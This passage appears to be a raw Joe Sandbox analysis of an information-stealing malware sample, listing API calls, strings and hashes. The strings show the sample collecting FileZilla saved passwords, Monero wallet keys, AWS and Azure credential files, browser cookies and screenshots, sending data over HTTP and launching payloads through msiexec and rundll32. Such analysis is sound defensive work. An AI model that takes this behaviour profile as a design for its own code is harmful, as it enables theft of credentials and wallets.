                                        • Part of subcall function 00AD8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00AD8F9B
                                        • Part of subcall function 00ADAC30: lstrcpy.KERNEL32(00000000,?), ref: 00ADAC82
                                        • Part of subcall function 00ADAC30: lstrcat.KERNEL32(00000000), ref: 00ADAC92
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                        • Part of subcall function 00ADAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00ADAAF6
                                        • Part of subcall function 00ACA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00ACA13C
                                        • Part of subcall function 00ACA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00ACA161
                                        • Part of subcall function 00ACA110: LocalAlloc.KERNEL32(00000040,?), ref: 00ACA181
                                        • Part of subcall function 00ACA110: ReadFile.KERNEL32(000000FF,?,00000000,00AC148F,00000000), ref: 00ACA1AA
                                        • Part of subcall function 00ACA110: LocalFree.KERNEL32(00AC148F), ref: 00ACA1E0
                                        • Part of subcall function 00ACA110: CloseHandle.KERNEL32(000000FF), ref: 00ACA1EA
                                        • Part of subcall function 00AD8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00AD8FE2
                                      • GetProcessHeap.KERNEL32(00000000,000F423F,00AE0DBF,00AE0DBE,00AE0DBB,00AE0DBA), ref: 00AD04C2
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00AD04C9
                                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 00AD04E5
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00AE0DB7), ref: 00AD04F3
                                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 00AD052F
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00AE0DB7), ref: 00AD053D
                                      • StrStrA.SHLWAPI(00000000,<User>), ref: 00AD0579
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00AE0DB7), ref: 00AD0587
                                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00AD05C3
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00AE0DB7), ref: 00AD05D5
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00AE0DB7), ref: 00AD0662
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00AE0DB7), ref: 00AD067A
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00AE0DB7), ref: 00AD0692
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00AE0DB7), ref: 00AD06AA
                                      • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00AD06C2
                                      • lstrcat.KERNEL32(?,profile: null), ref: 00AD06D1
                                      • lstrcat.KERNEL32(?,url: ), ref: 00AD06E0
                                      • lstrcat.KERNEL32(?,00000000), ref: 00AD06F3
                                      • lstrcat.KERNEL32(?,00AE1770), ref: 00AD0702
                                      • lstrcat.KERNEL32(?,00000000), ref: 00AD0715
                                      • lstrcat.KERNEL32(?,00AE1774), ref: 00AD0724
                                      • lstrcat.KERNEL32(?,login: ), ref: 00AD0733
                                      • lstrcat.KERNEL32(?,00000000), ref: 00AD0746
                                      • lstrcat.KERNEL32(?,00AE1780), ref: 00AD0755
                                      • lstrcat.KERNEL32(?,password: ), ref: 00AD0764
                                      • lstrcat.KERNEL32(?,00000000), ref: 00AD0777
                                      • lstrcat.KERNEL32(?,00AE1790), ref: 00AD0786
                                      • lstrcat.KERNEL32(?,00AE1794), ref: 00AD0795
                                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00AE0DB7), ref: 00AD07EE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                      • API String ID: 1942843190-555421843
                                      • Opcode ID: b2a34475d40261377d648956307316a59220a2f240e367ebb5a9958d492410cc
                                      • Instruction ID: 95849fe2e9dee20a67f64e1196d4ebc7d8f62adad052358763585a5fde62a0ef
                                      • Opcode Fuzzy Hash: b2a34475d40261377d648956307316a59220a2f240e367ebb5a9958d492410cc
                                      • Instruction Fuzzy Hash: B6D14176910208ABCB04EBF0DE96EEE7339AF24700F40855AF143B7295DF70AA45CB65
                                      APIs
                                        • Part of subcall function 00ADAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00ADAAF6
                                        • Part of subcall function 00AC4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00AC4889
                                        • Part of subcall function 00AC4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00AC4899
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00AC5A48
                                      • StrCmpCA.SHLWAPI(?,0154FCB0), ref: 00AC5A63
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00AC5BE3
                                      • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0154FD10,00000000,?,0154E800,00000000,?,00AE1B4C), ref: 00AC5EC1
                                      • lstrlen.KERNEL32(00000000), ref: 00AC5ED2
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00AC5EE3
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00AC5EEA
                                      • lstrlen.KERNEL32(00000000), ref: 00AC5EFF
                                      • lstrlen.KERNEL32(00000000), ref: 00AC5F28
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00AC5F41
                                      • lstrlen.KERNEL32(00000000,?,?), ref: 00AC5F6B
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00AC5F7F
                                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00AC5F9C
                                      • InternetCloseHandle.WININET(00000000), ref: 00AC6000
                                      • InternetCloseHandle.WININET(00000000), ref: 00AC600D
                                      • HttpOpenRequestA.WININET(00000000,0154FCE0,?,0154F530,00000000,00000000,00400100,00000000), ref: 00AC5C48
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                        • Part of subcall function 00ADAC30: lstrcpy.KERNEL32(00000000,?), ref: 00ADAC82
                                        • Part of subcall function 00ADAC30: lstrcat.KERNEL32(00000000), ref: 00ADAC92
                                      • InternetCloseHandle.WININET(00000000), ref: 00AC6017
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                      • String ID: "$"$------$------$------
                                      • API String ID: 874700897-2180234286
                                      • Opcode ID: 7222783dad201ecb8f035d8e426836d5f4447bcb6fa8d1e2e22d047578f848a0
                                      • Instruction ID: 300eff11967e04fbcdf87600e55788873592a7ceca2d11eac15bba9c521560c6
                                      • Opcode Fuzzy Hash: 7222783dad201ecb8f035d8e426836d5f4447bcb6fa8d1e2e22d047578f848a0
                                      • Instruction Fuzzy Hash: 5C12CE72920118ABCB15EBA0DDA5FEEB379BF24700F00459BF14762291EF706E49CB65
                                      APIs
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                        • Part of subcall function 00AD8CF0: GetSystemTime.KERNEL32(00AE0E1B,0154E890,00AE05B6,?,?,00AC13F9,?,0000001A,00AE0E1B,00000000,?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00AD8D16
                                        • Part of subcall function 00ADAC30: lstrcpy.KERNEL32(00000000,?), ref: 00ADAC82
                                        • Part of subcall function 00ADAC30: lstrcat.KERNEL32(00000000), ref: 00ADAC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00ACD083
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00ACD1C7
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00ACD1CE
                                      • lstrcat.KERNEL32(?,00000000), ref: 00ACD308
                                      • lstrcat.KERNEL32(?,00AE1570), ref: 00ACD317
                                      • lstrcat.KERNEL32(?,00000000), ref: 00ACD32A
                                      • lstrcat.KERNEL32(?,00AE1574), ref: 00ACD339
                                      • lstrcat.KERNEL32(?,00000000), ref: 00ACD34C
                                      • lstrcat.KERNEL32(?,00AE1578), ref: 00ACD35B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00ACD36E
                                      • lstrcat.KERNEL32(?,00AE157C), ref: 00ACD37D
                                      • lstrcat.KERNEL32(?,00000000), ref: 00ACD390
                                      • lstrcat.KERNEL32(?,00AE1580), ref: 00ACD39F
                                      • lstrcat.KERNEL32(?,00000000), ref: 00ACD3B2
                                      • lstrcat.KERNEL32(?,00AE1584), ref: 00ACD3C1
                                      • lstrcat.KERNEL32(?,00000000), ref: 00ACD3D4
                                      • lstrcat.KERNEL32(?,00AE1588), ref: 00ACD3E3
                                        • Part of subcall function 00ADAB30: lstrlen.KERNEL32(00AC4F55,?,?,00AC4F55,00AE0DDF), ref: 00ADAB3B
                                        • Part of subcall function 00ADAB30: lstrcpy.KERNEL32(00AE0DDF,00000000), ref: 00ADAB95
                                      • lstrlen.KERNEL32(?), ref: 00ACD42A
                                      • lstrlen.KERNEL32(?), ref: 00ACD439
                                        • Part of subcall function 00ADAD80: StrCmpCA.SHLWAPI(00000000,00AE1568,00ACD2A2,00AE1568,00000000), ref: 00ADAD9F
                                      • DeleteFileA.KERNEL32(00000000), ref: 00ACD4B4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                      • String ID:
                                      • API String ID: 1956182324-0
                                      • Opcode ID: 7f10323256ea296d858b50913cb222232bfffadce5e250d6d0c221cb93eb4b10
                                      • Instruction ID: bb11fbfd25b85473cde7bdc7db5209b19adfd18946815fb45c9381654644af72
                                      • Opcode Fuzzy Hash: 7f10323256ea296d858b50913cb222232bfffadce5e250d6d0c221cb93eb4b10
                                      • Instruction Fuzzy Hash: DCE13271920208ABCB04EBA0DE56EEE7379AF64301F00455AF147B72A1DF31AE49CB75
                                      APIs
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                        • Part of subcall function 00ADAC30: lstrcpy.KERNEL32(00000000,?), ref: 00ADAC82
                                        • Part of subcall function 00ADAC30: lstrcat.KERNEL32(00000000), ref: 00ADAC92
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0154D970,00000000,?,00AE1544,00000000,?,?), ref: 00ACCB6C
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00ACCB89
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00ACCB95
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00ACCBA8
                                      • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00ACCBD9
                                      • StrStrA.SHLWAPI(?,0154D9A0,00AE0B56), ref: 00ACCBF7
                                      • StrStrA.SHLWAPI(00000000,0154D838), ref: 00ACCC1E
                                      • StrStrA.SHLWAPI(?,0154E308,00000000,?,00AE1550,00000000,?,00000000,00000000,?,01548938,00000000,?,00AE154C,00000000,?), ref: 00ACCDA2
                                      • StrStrA.SHLWAPI(00000000,0154E388), ref: 00ACCDB9
                                        • Part of subcall function 00ACC920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00ACC971
                                        • Part of subcall function 00ACC920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00ACC97C
                                      • StrStrA.SHLWAPI(?,0154E388,00000000,?,00AE1554,00000000,?,00000000,015489A8), ref: 00ACCE5A
                                      • StrStrA.SHLWAPI(00000000,01548B18), ref: 00ACCE71
                                        • Part of subcall function 00ACC920: lstrcat.KERNEL32(?,00AE0B47), ref: 00ACCA43
                                        • Part of subcall function 00ACC920: lstrcat.KERNEL32(?,00AE0B4B), ref: 00ACCA57
                                        • Part of subcall function 00ACC920: lstrcat.KERNEL32(?,00AE0B4E), ref: 00ACCA78
                                      • lstrlen.KERNEL32(00000000), ref: 00ACCF44
                                      • CloseHandle.KERNEL32(00000000), ref: 00ACCF9C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                      • String ID:
                                      • API String ID: 3744635739-3916222277
                                      • Opcode ID: bb0e273897e536c16ab93d8c926944934e3a86706005235a68e576b3895077c9
                                      • Instruction ID: a687b86aedcfc9a67e3f750533dfcdaca9bc89567c50981702486625337710ce
                                      • Opcode Fuzzy Hash: bb0e273897e536c16ab93d8c926944934e3a86706005235a68e576b3895077c9
                                      • Instruction Fuzzy Hash: 36E1CF72910108ABCB14EBE4DDA5FEEB779AF64300F00459BF147A7291EF306A49CB65
                                      APIs
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                      • RegOpenKeyExA.ADVAPI32(00000000,0154BB90,00000000,00020019,00000000,00AE05BE), ref: 00AD8534
                                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00AD85B6
                                      • wsprintfA.USER32 ref: 00AD85E9
                                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00AD860B
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00AD861C
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00AD8629
                                        • Part of subcall function 00ADAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00ADAAF6
                                      Strings
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenlstrcpy$Enumwsprintf
                                      • String ID: - $%s\%s$?
                                      • API String ID: 3246050789-3278919252
                                      • Opcode ID: 7655b44d1f410fa5328c46120d2924f00c56f610d8add1e0ff8d3f0c2c65776c
                                      • Instruction ID: 1508dd2793899d79493b8c586e0ccbb2fb4b49ca1cbd795622f5fb9121710a0f
                                      • Opcode Fuzzy Hash: 7655b44d1f410fa5328c46120d2924f00c56f610d8add1e0ff8d3f0c2c65776c
                                      • Instruction Fuzzy Hash: A1812D71910218ABDB24DB54CD95FEA77B8FF18700F1086DAE10AA6240DF746F85CFA0
                                      APIs
                                        • Part of subcall function 00AD8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00AD8F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00AD5000
                                      • lstrcat.KERNEL32(?,\.azure\), ref: 00AD501D
                                        • Part of subcall function 00AD4B60: wsprintfA.USER32 ref: 00AD4B7C
                                        • Part of subcall function 00AD4B60: FindFirstFileA.KERNEL32(?,?), ref: 00AD4B93
                                      • lstrcat.KERNEL32(?,00000000), ref: 00AD508C
                                      • lstrcat.KERNEL32(?,\.aws\), ref: 00AD50A9
                                        • Part of subcall function 00AD4B60: StrCmpCA.SHLWAPI(?,00AE0FC4), ref: 00AD4BC1
                                        • Part of subcall function 00AD4B60: StrCmpCA.SHLWAPI(?,00AE0FC8), ref: 00AD4BD7
                                        • Part of subcall function 00AD4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00AD4DCD
                                        • Part of subcall function 00AD4B60: FindClose.KERNEL32(000000FF), ref: 00AD4DE2
                                      • lstrcat.KERNEL32(?,00000000), ref: 00AD5118
                                      • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00AD5135
                                        • Part of subcall function 00AD4B60: wsprintfA.USER32 ref: 00AD4C00
                                        • Part of subcall function 00AD4B60: StrCmpCA.SHLWAPI(?,00AE08D3), ref: 00AD4C15
                                        • Part of subcall function 00AD4B60: wsprintfA.USER32 ref: 00AD4C32
                                        • Part of subcall function 00AD4B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00AD4C6E
                                        • Part of subcall function 00AD4B60: lstrcat.KERNEL32(?,0154FBF0), ref: 00AD4C9A
                                        • Part of subcall function 00AD4B60: lstrcat.KERNEL32(?,00AE0FE0), ref: 00AD4CAC
                                        • Part of subcall function 00AD4B60: lstrcat.KERNEL32(?,?), ref: 00AD4CC0
                                        • Part of subcall function 00AD4B60: lstrcat.KERNEL32(?,00AE0FE4), ref: 00AD4CD2
                                        • Part of subcall function 00AD4B60: lstrcat.KERNEL32(?,?), ref: 00AD4CE6
                                        • Part of subcall function 00AD4B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00AD4CFC
                                        • Part of subcall function 00AD4B60: DeleteFileA.KERNEL32(?), ref: 00AD4D81
                                      Strings
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                      • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                      • API String ID: 949356159-974132213
                                      • Opcode ID: 5cbbe0d9287a3dfc1519c1a0d879a48c45845762ea6eb081660fb43303811111
                                      • Instruction ID: 0b394ea86e4c9c7b86a13b2baf29a018655c56517e7475d8e00e725cd0816451
                                      • Opcode Fuzzy Hash: 5cbbe0d9287a3dfc1519c1a0d879a48c45845762ea6eb081660fb43303811111
                                      • Instruction Fuzzy Hash: D641B57AA5031877DB10F770ED57FDD3328AB64700F404895B18AA61C2EEB5A7C88B92
                                      APIs
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00AD91FC
                                      Strings
                                      Yara matches
                                      Similarity
                                      • API ID: CreateGlobalStream
                                      • String ID: image/jpeg
                                      • API String ID: 2244384528-3785015651
                                      • Opcode ID: 9016aef85c15625d9f1fff34047be1f5d7b58c1bae694316245d3ac7eb87dbba
                                      • Instruction ID: d2faa4edc68e733dd4589fee8d589a352f31e3659bf8bf7a4647ab68e46ff6f8
                                      • Opcode Fuzzy Hash: 9016aef85c15625d9f1fff34047be1f5d7b58c1bae694316245d3ac7eb87dbba
                                      • Instruction Fuzzy Hash: 7671A975A24208ABDB14DFE4DD89FEEB778BB48700F10850AF516EB290DB75E904CB60
                                      APIs
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00AD3415
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00AD35AD
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00AD373A
                                      Strings
                                      Yara matches
                                      Similarity
                                      • API ID: ExecuteShell$lstrcpy
                                      • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                      • API String ID: 2507796910-3625054190
                                      • Opcode ID: 88630ed3187ed34f7bcbd3e35cb4c26de7c8b97f2038972ed155539116458ec5
                                      • Instruction ID: 7c75bdaf1921a37a421b38c5a23715a9c8c37cbcc66e8c74017e07dc53135a54
                                      • Opcode Fuzzy Hash: 88630ed3187ed34f7bcbd3e35cb4c26de7c8b97f2038972ed155539116458ec5
                                      • Instruction Fuzzy Hash: 4F12EE729101189ACB14EBA0DEA6FEDB739AF24300F40459BE14766291EF746F49CB62
                                      APIs
                                        • Part of subcall function 00AC9A50: InternetOpenA.WININET(00AE0AF6,00000001,00000000,00000000,00000000), ref: 00AC9A6A
                                      • lstrcat.KERNEL32(?,cookies), ref: 00AC9CAF
                                      • lstrcat.KERNEL32(?,00AE12C4), ref: 00AC9CC1
                                      • lstrcat.KERNEL32(?,?), ref: 00AC9CD5
                                      • lstrcat.KERNEL32(?,00AE12C8), ref: 00AC9CE7
                                      • lstrcat.KERNEL32(?,?), ref: 00AC9CFB
                                      • lstrcat.KERNEL32(?,.txt), ref: 00AC9D0D
                                      • lstrlen.KERNEL32(00000000), ref: 00AC9D17
                                      • lstrlen.KERNEL32(00000000), ref: 00AC9D26
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                      Strings
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                                      • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                      • API String ID: 3174675846-3542011879
                                      • Opcode ID: 8f37e3214c321abb4dfb1a4da203820d6e075fdba6269399018e5063d6739c85
                                      • Instruction ID: f03812c4f71cc5bd3e52a91ce6a6d1638445f85807ed36c413e87a622b4c553f
                                      • Opcode Fuzzy Hash: 8f37e3214c321abb4dfb1a4da203820d6e075fdba6269399018e5063d6739c85
                                      • Instruction Fuzzy Hash: 66516EB1910618ABCB14EBE0DD9AFEE7738BF14301F404559F20AA7191EF74AA49CF61
                                      APIs
                                        • Part of subcall function 00ADAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00ADAAF6
                                        • Part of subcall function 00AC62D0: InternetOpenA.WININET(00AE0DFF,00000001,00000000,00000000,00000000), ref: 00AC6331
                                        • Part of subcall function 00AC62D0: StrCmpCA.SHLWAPI(?,0154FCB0), ref: 00AC6353
                                        • Part of subcall function 00AC62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00AC6385
                                        • Part of subcall function 00AC62D0: HttpOpenRequestA.WININET(00000000,GET,?,0154F530,00000000,00000000,00400100,00000000), ref: 00AC63D5
                                        • Part of subcall function 00AC62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00AC640F
                                        • Part of subcall function 00AC62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00AC6421
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00AD5568
                                      • lstrlen.KERNEL32(00000000), ref: 00AD557F
                                        • Part of subcall function 00AD8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00AD8FE2
                                      • StrStrA.SHLWAPI(00000000,00000000), ref: 00AD55B4
                                      • lstrlen.KERNEL32(00000000), ref: 00AD55D3
                                      • lstrlen.KERNEL32(00000000), ref: 00AD55FE
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                      Strings
                                      Yara matches
                                      Similarity
                                      • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                      • API String ID: 3240024479-1526165396
                                      • Opcode ID: e01004abc80c35ac9639d768b9512737f7f156512ec32cd1586752c39c10ad6f
                                      • Instruction ID: cc8a9e3c15f2671c20910f1b56cce29037896d905ecc980632d53df2a9228fcf
                                      • Opcode Fuzzy Hash: e01004abc80c35ac9639d768b9512737f7f156512ec32cd1586752c39c10ad6f
                                      • Instruction Fuzzy Hash: E451DB70A10148ABCB14EF64CEA6AED7779AF20341F50445AE44767692EF30AF45CB62
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen
                                      • String ID:
                                      • API String ID: 2001356338-0
                                      • Opcode ID: 228b61006e8760cd46e17e4529b9288a340357d0b52c546d7b0d20c935c1bcfa
